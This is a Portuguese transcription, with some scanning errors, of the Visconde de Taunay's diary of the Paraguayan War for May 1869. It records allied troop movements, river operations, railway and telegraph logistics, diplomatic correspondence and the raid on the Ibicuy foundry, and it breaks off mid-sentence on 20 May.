Maio de 1869 – Diário de Visconde de Taunay – Campanha do Paraguai

Maio de 1869 – Diário de Visconde de Taunay – Campanha do Paraguai

Maio de 1869 – Diário de Visconde de Taunay – Campanha do Paraguai

Sábado, 1

Por telegrama de Assunção, recebeu Sua
Alteza notícia de ter descido a expedição do Manduvirá. O inimigo em número superior a 1.000 homens tentará cortar a
retirada dos navios com correntes, torpedos, vigas e trincheiras artilhadas.
Ficaram prisioneiros dois oficiais paraguaios, um dos quais ajudante-de-ordens,
e alguns soldados, além da perda que parece entre eles ter sido considerável. De nosso lado
houve alguns feridos e tão-somente um morto.

—   Correu em Assunção como certo que no caminho de S. Lourenço para Cerro Leon
haviam sido atacadas algumas carroças ou carretilhas particulares por uma força composta de 25
a 30 infantes e 8 a 12 cavaleiros; gente no princípio suposta paraguaia. Apenas Sua
Alteza soube desse boato, fez partir em direção ao ponto indicado uma partida de 50 homens de
cavalaria, cujo comandante nada pôde colher de preciso a esse respeito.

—   Da corte chegou o vapor Werneck trazendo 400
volumes para o Exército e alguma carga para a Esquadra.

Domingo, 2

De
Assunção
anunciou-se a chegada do vapor Annicota. que conduz de Humaitá 1.000 praças saídas do hospital e trem bélico, assim como a do Presidente, que trás de Buenos Aires uma locomotiva, seis vagões e fios elétricos para o telégrafo.

Desde que as
forças
haviam deixado a cidade de Assunção, serviu na via férrea uma locomotiva pequena e já em mau estado
que fora encontrada na estação daquela capital; posteriormente, com a continuação de serviço foi a caldeira estragando-se
cada vez mais, de modo que quase inservível se achava, quando começou a trabalhar a
máquina
que os argentinos tinham mandado buscar.

Fez, então, ao engenheiro
da força
aliada proposta do englobamento das duas administrações em uma única, pela
necessidade de formar uma só direção, à qual tocasse o cuidado da conservação da estrada e
reparação dos mecanismos com o ônus do transporte de todas as cargas e pessoal dos exércitos, proposta
esta que foi recusada, continuando a primitiva locomotiva, depois de novos
concertos, a fazer suas viagens diárias até Luque e Juquery, bem que desarranjos freqüentes a cada
instante manifestassem a urgência de pronta substituição.

A
nova locomotiva veio, pois, em tempo preencher faltas que iam a dar-se
impreterivelmente no tráfego, quando toda a regularidade tornava-se precisa a
fim de impedir desastres provenientes do não uniforme andamento dos trens, cujas horas de partida
e chegada deviam ser perfeitamente combinadas em viagens que se faziam numa
linha de trilhos simples.

—  A respeito dos reiterados pedidos do Comandante inglês Parsons, Sua Alteza
foi ter com o General Mitre, que concordou em despachar-se um parlamento até Patihocuê a fim de
entregar nas linhas paraguaias os papéis trazidos de Buenos Aires por aquele Comandante,
ficando, contudo, à vontade do Sr. Príncipe determinar o dia de sua remessa.

Os generais
decidiram ainda mandar explorações de cavalaria até S. Lourenço e Itá com o fim de revistarem diversos depósitos de couros e
solas que naqueles pontos consta existirem.

—  Das partes remetidas da Esquadra tiram-se os
seguintes e interessantes episódios que se deram na descida do Rio Manduvirá pela nossa
esquadrilha.

Como acima
fica dito, internara-se ela quase até perto de Caraguatahy em busca dos vapores inimigos e,
em conseqüência dá baixa das águas e sobretudo das faltas no fornecimento, fora
obrigada, no dia 27, a empreender a volta, navegando em revés, por não poderem os
monitores virar e aproar.

Desde logo embaraços foram-se
apresentando: ora grossas vigas atravancavam o rio, ora eram árvores possantes cuja rama achava-se entresachada de cipós e ervas para enredarem as hélices e pearem o seu movimento. O Ceará ia porém na vanguarda e
sua maruja limpava a corrente, traçando o caminho aos vapores que lhe seguiam a esteira. Em todo dia 28, navegou-se a jusante com
toda a força a ver se ficava transposto o Passo de Quarayó, onde as lanchas, na sua volta, haviam já sofrido fogo de entrinchei-ramentos; contudo, a noite caiu, e só no dia seguinte
pela manhã é que se efetuou a passagem. O passo
fortificado com uma bateria a barbeta de duas peças, uma grande trincheira
guarnecida por mil e cem homens, três cabos de manilha sustentados em carretas com vigas e árvores
atravessadas, formavam aí uma defesa respeitável. Ainda é o Ceará que abre
caminho; avança a todo vapor, estaca por momentos pela resistência dos cabos-,
rompe-os porém, corta com seu choque as ramas enredadas e, mais
baixo, espera sobre rodas seus companheiros de penosa viagem. Esses, debaixo
de fuzilaria, não se fazem esperados; dois torpedos que o inimigo lança não arrebentam, e
toda a esquadrilha se reúne, deixando longe as fortificações de terra.

Muito
tinha se conseguido; mais se tentou e com resultado feliz. Subindo a flotilha
com toda a ousadia a correnteza do rio que tanto custara já descer, chega a
alcance de bombardear a trincheira inimiga e vendo que os paraguaios abandonavam
suas posições, imediatamente tenta um desembarque de 80 homens que conseguem
aprisionar dois oficiais e três praças, cujos nomes são os seguintes:

Tenente de Marinha Ângelo Fernandes

Alferes Victorino Escato.

Sargento Victorino Vasques.

Marinheiro Agostinho Ortiz.

Soldado de Cavalaria Juan Flores.

A
esquadrilha de então para diante desceu o rio até a sua foz sem
mais acidente. A perda que sofreu foi de um único homem, tendo somente seis feridos, entre os quais
o bravo maquinista Júlio Raposo de Mello merece particular atenção por ter sido
duas vezes tocado por bala, extraindo com a própria mão o primeiro projétil que ofendera.

Os
prisioneiros dizem que em combate haviam perdido o Capitão Lopez, ficando
gravemente ferido o seu imediato. Declaram saber somente que o acampamento do
ditador Lopez é em Ascurra: acrescentam que em Caacupê já funcionava
regularmente a fundição de peças de artilharia e que o ministro americano reside em
Peribebuy, indo semanalmente visitar o presidente.

— O Sr. G. I. Parsons, comandante do navio
inglês
Beacon, dirigiu novamente a Sua Alteza um ofício sobre a urgência em que se
via de ir entregar uma carta endereçada por Lorde Clarendon a D. Luiz Caminos, carta que,
pela demora, ele remeteu ao Comandante-em-Chefe para ter aquele destino.

Segunda-feira, 3

Pela
manhã,
o Sr. General Mitre veio ao Quartel-General e assinou o acordo que, sob seus
olhos, redigiu Sua Alteza relativamente a exploração que devia ir arrecadar os produtos existentes fora dos acampamentos,
para cuja comissão veio durante o dia, tomar instruções o Comandante do Regimento
de Cavalaria San Martin, oficial que foi se entender com o comandante do
Corpo de Exército.

— O
paraguaio Faustino Gonsalez, soldado de Cavalaria e um dos passados mandados
de Humaitá, respondeu a interrogatório e depôs que viera de Bouby perto
de S. Pedro, sete léguas para cá do Paraná e cinco de Tebicuary-guaçu, onde se
achava com alguns soldados mais no mando do chefe Manteúdo-, atravessara com
cinco companheiros as povoações desertas de S. Thiago, Yabebui e Pedro Gonsalez
e se apresentara em Humaitá. Nada diz de importante e tão-somente que da Vila
da Encarnação haviam fugido os cento e vinte homens de guarnição, apenas se aproximaram dois
encouraçados por aqueles lados.

— Tendo,
no dia 30 do mês próximo passado, o Coronel encarregado da polícia
dos acampamentos Ferreira da Silva dado parte que naquele dia uma partida
paraguaia havia atacado umas carroças particulares, pertencentes ao argentino
Gennaro Molina, as quais tinham ido buscar solas e couros em Posta-lbicuí debaixo
da proteção de um esquadrão de cavalaria brasileira do Corpo n° 15, se bem
não tivesse recebido ordens a tal respeito, Sua Alteza, depois de tomar as providências
acima exaradas, mandou indagar do fato e concluiu, por terem sido poupados os
peões e carroceiros, que a força atacante não devia ser composta de paraguaios,
e sim de desertores dos exércitos aliados que formam uma espécie de niontoneria
nos arredores da cidade de Assunção e junto às barrancas
do Rio Paraguai

O pouco cuidado que houve na imediata
indagação deste acontecimento deu lugar a certas medidas, umas
demissionárias, outras de repreensão para diversos oficiais,
ficando presos um tenente e um alferes comprometidos nas revelações dos paisanos
estrangeiros.

Terça-feira, 4

Por ordem de Sua Alteza, dirigida no
dia 2 aos generais comandantes dos Corpos de Exército!
procédeu-se a uma exploração na direção do povoado de Itaugué e simultaneamente outra
no rumo de S. Lourenço.

O reconhecimento sobre
Itauguá foi por duas frações de coluna, uma das quais seguiu para
aquele ponto, indo a outra pelo trilho de ferro até a ponte de Patino-cuê,
perto da qual bifurca-se a estrada. Eram elas compostas dos dois Corpos
nos 19 e 21 de Cavalaria, cios Batalhões nos10 e 50 de
Infantaria e uma bateria do 1 ° Regimento de Artilharia, e iam comandadas pelo
Coronel João Nunes da Silva Tavares,
levando os engenheiros Capitão Catão Roxo e 2o Tenente Jourdan, que em seus trabalhos deviam ser ajudados pelas informações do Major
vaqueano Céspedes, o qual servia de guia.

A
segunda coluna, cujo rumo principal era para Sul, levava o 5° Corpo de Caçadores a cavalo,
um batalhão de Infantaria, duas peças de artilharia e seguiu ao mando do Coronel Bento
Martins Menezes.

O 1o Corpo de Exército ficou de
sobreaviso para o caso em que o inimigo se apresentasse em massa e procurasse
incomodar ou impedir os reconhecimentos.

A primeira coluna chegou
às 9h
e 30 min da manhã sem inconveniente algum a Itauguá, que encontrou
deserto e retrocedeu ao meio-dia, destacando uma zartida de cavalaria para
explorar com os engenheiros o caminho que, diretamente daquele ponto, parte
para Areguá sem dar volta por Patinocuê. A força de proteção que, no entroncamento das estradas, ficara a
ajudar o movimento sobre Itauguá, trocou com as avançadas paraguaias ti.ros de guerrilhas, durante a qual o

Sargento Galdino da Silva, precipitando-se sobre um piquete, matou-lhe dois
homens. De nosso lado houve só ferimentos em cavalos.

Quarta-feira, 5

Ao
comandante de Assunção remeteram-se cópias do acordo feito pelos generais aliados a respeito
não só dos produtos
existentes naquela cidade e que deverão ser apreendidos por não terem sido denunciados, senão da criação da comissão subsidiária destinada a
arrecadar os objetos paraguaios que se achem em depósitos afastados
da capital.

Quinta-feira, 6

O Sr.
Chefe-de-Esquadra comunicou a Sua Alteza que havia proibido a saída de navios
carregados dos produtos do país ou de gêneros tirados de Assunção sem prévia licença da respectiva
comissão
e recebeu ordem para deixar sair aqueles objetos, cujos proprietários provassem tê-los comprado à comissão internacional
incumbida da venda dos despojos inimigos.

— Partiram da
vanguarda dois esquadrões de cavalaria para precederem o Capitão Rocha Osório, que em caráter de parlamentário foi entregar
os ofícios
da delegação inglesa e acompanhar o próprio Comandante Parsons, o qual levava a Bandeira de
sua nação alçada, como pedira, ao lado da do parlamento. A diligência só a duas léguas além de Patino-cuê é que pode transmitir aqueles ofícios e à noitinha voltou
para Luque.

O comandante
da coluna que fora explorar campos pelo lado do Sul até a barranca de Santo Antônio junto ao Rio Paraguai participou que chegara a
Capiatá às oito e meia horas da manhã, a Itauguá, para banda de E., às três e meia da tarde; voltara, no dia 5, por Itá, onde só encontrara 147 solas cortidas que vieram trazidas em galeras e seguira até Santo Antônio e Santo Ignácio, sem nunca achar sinal de inimigo.

Sexta-feira, 7

Diversos
telegramas, anunciando uns a chegada de vapores de Montevidéu e de Buenos
Aires, outros pedindo ordens e transmitindo disposições de detalhes são remetidos de
Assunção.

A telegrafia
tem prestado excelentes serviços e trabalha incessantemente sendo raros os
desarranjos nas máquinas eletromagnéticas ou na linha de fios que a atividade do oficial
engenheiro imediatamente dispõe, utilizando-se dos postes deixados pelos paraguaios
no seguimento da estrada de ferro.14

Sábado, 8

Sua
Alteza foi a Assunção e visitou com minuciosidade os hospitais e repartições, voltando às 6 horas da
tarde. Acha-se comandando aquela praça o Coronel Paranhos que substituíra o Coronel
Hermes da Fonseca.

— Até as linhas da vanguarda inimiga, foram acompanhados do
Capitão
Osório,
o Chefe-de-Estado-Maior da Força Naval dos Estados Unidos e um oficial da mesma
Marinha, os quais regressaram à noite.

Domingo, 9

Sua Alteza participou
aos Srs. Generais Mitre e Castro que, em virtude dê resolução tomada pelos
representantes dos governos aliados em Buenos Aires e comunicada pelo enviado extraordinário e ministro plenipotenciário em missão especial de Sua Majestade o Imperador do Brasil. no
Rio da Prata, haviam seguido

14 Estes postes são de lapacho ou
pau de arco, faceados nas proximidades das cidades; algumas vezes são simplesmente de
carandá.
Todos eles estão polidamente fincados e alguns conservavam ainda os
seta isoladores. Em diversas estações foram encontrados grandes rolos de fios.

 

com um parlamentário brasileiro até os piquetes inimigos sitos além da ponte de Patino-cuê, no dia 6. o
Comandante da canhoneira de Sua Majestade Britânica Beacon e no dia
8 o Chefe de Estado-Maior da força naval dos Estados Unidos da América do Norte no
Sul do Atlântico, e aí fora entregue pelo pariamentário brasileiro.
na primeira dessas ocasiões, uma carta oficial endereçada por aquele comandantes
D. Luiz Caminos, Ministro dos Negócios Estrangeiros no Paraguai, e, na segunda, uma que
dirigia o mencionado chefe de estado-maior ao General Mac-Mahon, Ministro
residente no Paraguai.

 

No dia 8, foi também recebido do
inimigo um saco endereçado por aquele general ao Sr. Worthington, Ministro dos
Estados Unidos em Buenos Aires e imediatamente remetido ao acima referido
chefe de estado-maior.

Declarou por fim o
Senhor Príncipe que nem um nem outro desses oficiais de armadas neutras
haviam penetrado no acampamento inimigo, devendo eles apresentar o seu pedido a
tal respeito, se tiverem esse desejo.

Em aditamento a este ofício, foi aos mesmos chefes
comunicado que nas linhas avançadas brasileiras fora entregue, por um pariamentário paraguaio, um
ofício
da legação dos Estados Unidos dirigido ao Comandante Francis M. Ramsay, Chefe de
Estado-Maior, ofício que foi logo entregue, tendo sido o pariamentário recebido com
todas as formalidades.

Segunda-feira, 10

Ao Cônsul do Brasil em
Assunção
e ao Conselheiro Paranhos, foram remetidas cópias do acordo dos generais aliados acerca da consulta
feita pelo tribunal administrativo daquela cidade relativamente à posse de
propriedades pertencentes a mulheres que estejam retidas em poder do inimigo.
Essas propriedades fi-cam por ora garantidas àqueles que provarem ser parentes
chegados a elas ou tiverem algum documento que lhes permita o usufruto.

—  Sua Alteza foi ter com o General Mitre para
apresentar à sua assinatura a convenção relativa ao tribunal internacional, recebendo, poucas
horas depois, a visita daquele general que tinha em companhia do Sr. Hopkins
falar sobre uma pretensão desse americano, o qual deseja montar uma serraria no
Chaco e precisa licença do Comandante-em-Chefe brasileiro, por isso que a polícia dos rios
pertence à nossa esquadra.

—  Atendendo às contínuas irregularidades e desacatos às propriedades
paraguaias, produzidos pelos numerosos vivandeiros que acompanham os exércitos aliados e
que se desmandam sob o in/luxo do espírito de ganância, Sua Alteza mandou prender diversos indivíduos implicados
na questão Molina acima referida, sendo logo embarcados para Montevidéu três deles e ficando
os outros, depois de concluírem o tempo de prisão que lhes fora determinado, debaixo das vistas das
autoridades.

Terça-feira, 11

Apesar do
mau tempo, que de dias não amainara, seguiram para os piquetes de Patino-cuê, os oficiais
americanos e o comandante inglês, sempre com as devidas formalidades, voltando este só, visto como os
outros, transpondo as linhas paraguaias, tinham ido se entender com o General
Mac-Mahon.

—  De Humaitá chegou um vapor trazendo 475 cavalos, um parque de
artilharia e trem de hospital.

Quarta-feira, 12

Por
telegrama de Assunção é anunciada a vinda do vapor Dezesseis de Abril, que
chegara com uma chata, trazendo o Tenente-Coronel Chodasiewicz, o qual logo
partiu para Luque pelo trem de ferro.

—  De Buenos Aires recebem-se 430 cavalos, remetidos no
vapor Leopoldo por Eduardo e Cândido Gomes.

Quinta-feira, 13

Reiteraram-se
as recomendações precisas para a cessação das irregularidades que
existem no movimento postal para Cuiabá, devendo os vapores que vã: ao Fecho dos
Morros receber aí a mala da capital da província e de Corumbá.

Sexta-feira,  14

Ao
Presidente da Província de Mato Grosso comunicou Sua Alteza que as forças existentes naquela capital, achando-se debaixo do seu comando,
deviam quarto antes
se mover em direção ao sul, ficando o mais forte dos
batalhões no Fecho de 5 Morros para substituir o Batalhão de Pontoneiros
que atualmente lá se acha, e seguindo o resto da coluna até Assunção, onde virá formar um corpo
de reserva.

 

Ficou
também
recomendada a remessa de todo o material do hospital13, das
bocas-de-fogo raiadas e correspondentes petrechos, sendo tudo embarcado com
brevidade nos vapores que estiverem disponíveis. Algum oficial de engenheiros, atualmente em
Cuiabá,
deverá
concluir as fortificações iniciadas no Fecho dos Morros.

Às seis horas da tarde voltaram de Ascurra os dois
oficiais americanos que tinham ido procurar o General Mac-Mahon;
apresentaram-se às nossas linhas de luquery; acompanhados de um piquete
paraguaio, havendo deixado Lopez em seu acampamento às seis horas da manhã. Dizem que
vieram por caminhos péssimos e que tiveram de atravessar um rio bastante
profundo no limite de uma extensa e bela planície dominada em toda a sua vastidão pela casa do
ditador.

Retiraram-se
para Assunção, às nove horas da noite, por um trem especial que Sua Alteza mandou pôr a disposição deles.

Sábado, 15

Sua
Alteza oficiou ao Comandante do 2o Corpo de Exército
comunicando-lhe que naquela data passavam a ficar sob seu comando as forças presentemente
estacionadas no Rosário bem como a 2ª Divisão de Cavalaria, comandada pelo Brigadeiro José Antônio Corrêa da Câmara, devendo ser
a este general determinado que, com a coluna do Rosário reforçada da 6a
Brigada de Cavalaria, de um Batalhão de Infantaria, e de duas bocas-de-fogo do 4a
Corpo Provisório de Artilharia, siga a bater ou aprisionar as forças inimigas que,
pelos depoimentos dos passados e prisioneiros, consta existirem na margem
direita do Rio Jejuy e na de seu
afluente Aguaray, no lugar por uns denominado Sargento Lomas, por outros
Tupipuytan, e que se acham completamente separadas do grosso do exército de Lopez.

A esta
coluna acompanhará oTenente-Coronel Chodasiewicz, o qual ultimamente fez
uma exploração a certos pontos do Rio Jejuy até acima do porto
de S. Pedro e que poderá dar boas indicações.

Pediram-se os cacolets
que se achassem em depósito, dos que haviam sido, do ponto dos Bahús. mandados para
a capital pela expedição de Mato Cros_o. Os cacolets. invenção do Barão Larey nas
campanha do Egito e o melhor meio para a condução rios feridos e doentes
nas últimas
expedições do sul da Argélia na Rabylla (1816), provaram muito bem durante a
diuturna marcha daquela força que, depois de uma viagem de dois anos e meio pelas
províncias
de S. Paulo, Minas, Goiás e Mato Grosso, invadiu o Norte do Paraguai.

45

DIÁRIO DO EXÉRCITO-CAMPANHA DO
PARAGUA11869-1870

O Comandante
da Esquadra teve disso conhecimento para que pusesse a disposição da força expedicionária os navios
disponíveis,
servindo desde já para transporte o vapor Itapicuru e uma chata.

A
coluna efetuará seu desembarque no ponto mais conveniente para colher
de surpresa o inimigo, ou na margem do Rio Paraguai acima da foz do lejuy, ou
na direita deste rio, seguindo sem demora ao encontro da força paraguaia, a
qual procurará acurralar na confluência dos dois rios lejuy e Aguaray, cortando-lhe a
retirada e mantendo sempre ilesa a linha de comunicação com a
flotilha, que subirá acima do passo Coqueré.

Concluída esta operação, cujo fim é também libertar as
muitas famílias que por aquela zona se vêem ainda sujeitas aos caprichos de Lopez e de seus
comandados e à qual portanto deverá presidir completo espírito de conciliação e prudência, nossa força retirar-se-á para um ponto do
litoral do Paraguai, podendo o seu comandante regressar logo para Assunção.

—  Aos generais aliados comunicou Sua Alteza as
diferentes idas e vindas dos oficiais ingleses e americanos às linhas
paraguaias, tendo ficado em seu poder diferentes cartas abertas e dirigidas a súditos ingleses,
as quais deverão ser em ocasião oportuna remetidas, com exclusão daquelas que
tiverem endereço para indivíduos que se acham voluntariamente em companhia de
Lopez.

Na volta a
este acampamento, os oficiais americanos declararam que tinham levado ao
General Mac-Mahon, Ministro residente dos Estados Unidos, a participação de sua demissão e que naqueles
dias próximos sairia ele de Ascurra para dirigir-se a Assunção.

—  O Sr. General Mitre veio ao Quartel-General pedir a
Sua Alteza revogação da ordem que recebera o comandante da guarnição de Humaitá para impedir a
livre passagem de gado entre o Passo da Pátria e o Rio Tebicuary-, fundamentando tal pedido na
impossibilidade que tinham os seus fornecedores de transportar por água as reses do
contrato por se acharem os vapores presentemente desarranjados.

Como
meio de sanar dificuldades de momento e provisoriamente, foi consentida a
suspensão da medida anterior, devendo, apenas removerem-se os obstáculos atuais, ser
posta novamente em execução.

Em
seguida, aquele General participou que ia mudar de acampamento, avançando para
luquery, fato que não sofreu contestação, visto como Sua Alteza fez também presente a sua
resolução de marchar com brevidade.

—  O comandante de Assunção em telegrama anunciou que na
altura de S. Lourenço fora uma ponta de gado de João Apollinario,
vinda do Passo da Pátria e destinada à Esquadra, atacada por*um bando armado ou inimigo ou
formado de desertores, o qual, entretanto, viu-se frustrado em seus intentos
pela resolução do capataz e de sua gente.

Não só neste ponto, mas
ainda na margem do Paraguai, têm-se dado desses atentados. Um bote tripulado por
quatro homens, tendo se encostado à barranca do Lambaré, foi também repentinamente assaltado, escapando-se um só homem que
declarou terem sido os seus companheiros ou mortos ou aprisionados.

O
comandante da praça fez sem detença partir uma força de 20 homens com um oficial de confiança encarregado de
ir bater as cercanias da cidade e surpreender alguns desses bandos.

Estes fatos
têm-se
produzido porvezes: já no dia 10, haviam desaparecido dois soldados do 40° de Voluntários,
apresentando-se depois um que declarou haver sido o seu companheiro feito
prisioneiro por gente que contudo não lhe parece paraguaia-, a 13 oficiava o General Castro
que, tendo-se afastado do acampamento oriental, sem licença, cinco
paraguaios da Legião, tiveram esses que guerrilhar contra 20 homens,
podendo pôr-se a salvamento quatro e desaparecendo um que se atirou nos matos.
Foi no meio da gente atacante reconhecido um alferes prisioneiro de Angustura e
que fugira de nosso poder.

Com o fim de
agarrar esses grupos havia também o Tenente-Coronel Coronado saído por ordem de
seu comandante, e ainda não se recolhera, apesar de decorridos oito dias.

Entretanto,
para impedir que os soldados se arredem em demasia de seus abarracamentos na
procura de canas, abóboras etc, existentes em roças paraguaias
abandonadas, procura que, muitas vezes, os expõe pela natural imprudência aos golpes
do inimigo, Sua Alteza deu ordem aos, comandantes de Corpos de Exército para que
proibissem terminantemente às suas praças o afastarem-se além dos limites marcados pela boa audição dos toques de
cometa.

Esta
medida, imediatamente posta em prática, fez de pronto diminuir o número de deserções, as quais
figurando como tais, às mais das vezes não dependiam da vontade do soldado, mas sim da morte ou
do aprisionamento deles por pequenas partidas emboscadas em matagais, e longe
dos acampamentos.

Domingo, 16

Por
Luque passou o Brigadeiro Corrêa da Câmara com a coluna que vai operar contra o Major Galeano
nas margens do Rio Jejuy.

 

 

Segunda-feira, 17

De Assunção vem parte de
haver-se dado princípio aos trabalhos de fortifi-cação que Sua Alteza
determinara, fazendo-se, em diversas ruas, tranqueiras com plataformas para artilharia num perímetro que
compreende os depósitos, ficando porém fora dele o hospital e a estação da estrada de
ferro que hão de ser defendidos por obras acessórias. As trincheiras abertas de princípio e não revestidas tinham-se
abatido depois de forte temporal acompanhado de chuva de 13, de
modo que encetaram-se outras, feitas com mais regularidade e cuidado.

—  O Chefe do Estado-Maior da Esquadra comunica,
relativamente ao embarque da expedição destinada ao Rosário, que os vapores, transportes e chatas carregaram a
cavalaria; o Silvado, a Infantaria, e o Henrique Martins, a
Artilharia, devendo ficar tudo à bordo hoje de tarde, para que parta amanhã ao alvorecer.

—  A noite, um telegrama de Assunção transmitiu, a
pedido do General Castro, a notícia de que o Tenente-Coronel Coronado, à frente de 80
homens, dirigira-se ao estabelecimento de fundição de ferro em Ibicuy, onde
chegara com felicidade, fazendo aí cento e tantos prisioneiros, resgatara oitenta e
tantos homens de diversas nacionalidades, e trouxera para cima de cem mulheres
e crianças. Anuncia ele, porém, que forças maiores vêm ao seu encalço, obrigando-o a pedir reforço, o qual, na
verdade, foi-lhe dado pelo Batalhão oriental n° 24 e 80 homens nossos de cavalaria, que logo seguiram
ao seu encontro para os lados de Santo Antônio, saindo também de Luque a brigada comandada pelo Coronel M. de
Oliveira Bueno.

Terça-feira,  18

Sua Alteza
recebeu, pela manhã, por um ajudante-de-ordens do General Castro a
participação oficial da expedição do Tenente-Coronel Coronado, à qual foi
comunicada ao General Mitre que ainda de nada tivera notícia e que se
achava de visita naquela ocasião.

— De Assunção veio parte que recolhera-se ontem a diligência que fora bater
as proximidades da cidade e destruirá canoa que ficara junto à barranca do Lambaré, e que foi
abandonada à correnteza por não ter-se podido inutilizá-la por falta de meios. Viram-se
vestígios
de cavaleiros e de homens a pé em número não totalmente insignificante, o que obrigara a mandar
partidas fortes e freqüentes, bem que a natureza do terreno, todo cortado de
banhados, dificulte bastante essas explorações. Um brasileiro, morador nessa paragem e vaqueano,
ficou de avisar
da ocasião própria para um golpe de mão que inutilize a esses troços de inimigos ou
de malfeitores.

A expedição do General Câmara tem sido
embarcada com toda a presteza, e anuncia-se que saíra do porto o último navio
carregado de gente. Seguiram 500 cavalos mais ou menos, e o resto da cavalaria
não
poderá
tardara ser transportada. Os fornecedores de alfafa e mantimentos tiveram
reboques dos navios do governo. A artilharia com suas munições e três galeras já se acham também a bordo.

—  Notificam-se as chegadas de um vapor rebocando um
navio com 200
cavalos do contratante Gomes, e do Isabel que traz da corte barracas,
fardamento
e 20 e poucas praças.

Foi
publicada a Ordem do Dia na 11 dando nova organização aos Corpos de
Exército
em vista dos próximos movimentos que se vão empreender. O Primeiro foi
composto da Primeira e Terceira Divisões de Cavalaria e da Segunda de Infantaria: o Segundo
da Primeira de Infantaria e Segunda e Quarta de Cavalaria, que se acham uma em
caminho para o Rio Jejuy e outra no
Aguapehy. Os Corpos de Artilharia ficaram, como antes, constituindo uma
Brigada debaixo das ordens imediatas do Quartel-General e reorganizou-se o 36° Corpo de Voluntários que foi
formado das suas antigas praças existentes no 9C‘ Batalhão de Infantaria,
e de outras que a ele se acharam em outro tempo adidas.

—  A parte oficial do Tenente-Coronel Hippolyto Coronado,
dada ao General Castro, Comandante da Divisão oriental, relata que ele saíra de Assunção no dia 5 do
corrente à frente de 86 homens bem montados com destino à fábrica de fundição de ferro do
Ibicuy. Avançado para S.E., alcançara no dia 8, pela manhã, Franca Islã, onde matou sete
homens que resistiram apesar de não serem paraguaios, porém sim desertores dos exércitos aliados.
No dia 11, chegou a Capilla do Ibicuy, tomando logo de surpresa
uma guarda de 12 homens; enfim, no dia 13, pelas sete e meia horas da manhã, achou-se
defronte do seu objetivo.

A localidade
prestava-se perfeitamente à defensiva, pois por uma garganta apertada é que se penetrava
num recôncavo de montanhas; sem desanimar contudo a gente oriental pôs pé em terra e galhardamente
sustentou por mais de uma hora fogo de fuzilaria, levando em seguida de vencida
o inimigo que esmoreceu ao ver o Comandante Insfran cair nas mãos dos atacantes.
Cinqüenta
e três
soldados, o Capitão Insfran, o 2° Tenente Moreno e Alferes Caceres ficaram prisioneiros;
23 paraguaios foram mortos, fugindo o resto para os matos.

Além de tão importante
resultado, ainda mais aumentado, logo depois, pela destruição de máquinas e edifícios, teve o
chefe de tão arrojada expedição a satisfacão de dar a liberdade a mais de 150 prisioneiros de
todas as nacionalidades, inclusive um russo e 31 brasileiros, que trabalhavam
debaixo da cruel pressão do comandante na fundição de ferro e fabrico de lanças e balas,
sujeitos às mais extremas necessidades e sem esperança de salvação.

O
Tenente-Coronel Coronado, considerando a crueza com que sempre se portara o
Capitão
Insfran, e a maneira altiva com que recebera a intimação de render-se,
mandou-o passar pelas armas, sendo esse ato, aliás tão contrário à prática
invariavelmente seguida pelas forças aliadas, aplaudido por todos aqueles que tinham
sofrido os rigores de seu gênio.

Com todos os resgatados,
em cujo número se acham alguns maquinistas, e cento e cinqüenta mulheres, e
tangendo um avultado número de reses, voltou a coluna, participando de Franca
Isla, a 15, o seu comandante, todo o ocorrido e ao mesmo tempo pedindo socorro
por causa da tropa que ele sabia vir em sua perseguição, o que
imediatamente foi feito, como atrás fica dito, tanto da parte da Divisão oriental como
da do Exército Brasileiro.

—  Pela Ordem do Dia n° 12, teve licença o Marechal-de-Campo Guilherme Xavier de Souza,
Comandante interino do 1° Corpo de Exército, para retirar-se para sua província por terem-se
agravado os habituais padecimentos, sendo nomeado para substituí-lo naquele
comando o Brigadeiro José Luiz Menna Barreto.

—  Aos comandantes dos Corpos de Exército foram
comunicadas as disposições para a próxima marcha sobre o ponto do Pirayu.

Uma
coluna, formada da 1* Divisão de Cavalaria, das Brigadas T e 6a
de Infantaria e do 2o Regimento de Artilharia, sairá, a 20, de Luque
para dirigir-se a 5. até S. Lourenço.desviando-se então a E.-, a 21 estará em Capiatá, a 22 em Itáe a 23 em Pirayu, onde, fazendo-se forte, guardará a estrada de
ferro, destacando uma brigada de cavalaria e uma bateria de artilharia para ir
ocupar Paraguai e impedir estragos na linha de trilhos.

A coluna
marcha sob as ordens do General João M. Menna Barreto, formando as duas brigadas uma
divisão
ao mando do Coronel Herculano Sanches da Silva Pedra.

Durante este
movimento que resguarda o flanco direito do Exército em sus futura progressão, o Io Corpo, o Quartel-General do Comando-em-Chefe, o Batalhão de Engenheiros,
o Io Regimento de Artilharia a cavalo, o 1° Batalhão de Artilharia
a pé
marcharão, no dia 22, para o povoado de ltauguá pela estrada de Patiño-cuê,.ganhando
terreno a S.E. e contornando a Lagoa do Ipararay. De ltauguá sairá uma coluna com
destino ao Taquaral, tomando este ponto de revés, assim como o  de Patino-cuê que fica na via
férrea
e, de volta sobre seus passos, seguirá para Pirayu, onde se fará a junção geral.

O 2o
Corpo de Exército mover-se-á simultaneamente com o Primeiro, depois de deixar
guardas na direção de Limpio e Salgado para cobrir a capital e virá ocupando as posições que forem
sendo sucessivamente deixadas, parando em ponto que lhe for determinado por
ordem partida do Quartel-General do Comando-em-chefe.

Para
facilitar logo o princípio da marcha, foi ordenado ao Comandante do Io Corpo de Exército, que as forças da Ia
Divisão de Cavalaria eaó’ Brigada de Infantaria, que ora se acham acampados em
Lambaré,
venham se colocar no caminho que de Luque segue para S. Lourenço.

O
Comandante de Artilharia teve ordem para que o 1° Batalhão de Artilharia a

transpusesse no dia 21 o Arroio luquery, tirando os animais de que necessitar
para seu movimento de outros corpos da mesma arma e com preferência do 4o Corpo
Provisório.

Quarta-feira,  19

Foi
recebida comunicação do cônsul português em Assunção, declarando que se ausenta temporariamente daquela
cidade, deixando o consulado entregue ao cidadão Maurício Gonzaga da
Costa.

— Acusou-se conhecimento da deliberação tomada a 22 de
abril do ano corrente entre os enviados extraordinários do Brasil e
do Estado Oriental, e o Ministro das Relações Exteriores da República Argentina em referência a questão suscitada
pelos Ministros da França e Itália, por ocasião de quererem os cônsules dessas nacionalidades em Assunção representar
seus compatriotas ausentes ou falecidos ante a comissão militar mista
encarregada de dar solução às reclamações concernentes a depósitos de produtos paraguaios.

A respeito
do caráter
que aqueles agentes devam ter junto aos generais aliados ficou mantido o statu
quo.

Quinta-feira, 20

Sua
Alteza, ponderando ao governo imperial as vantagens inconcussas que resultam do
emprego das armas de carregar pela culatra aceitas por todas as potências européias, e já por algumas do
continente americano, pediu que, com a possível brevidade, a comissão de melhoramentos do material do
Exército
informasse quais as experiências a que, desde janeiro de 1868, tem procedido entre
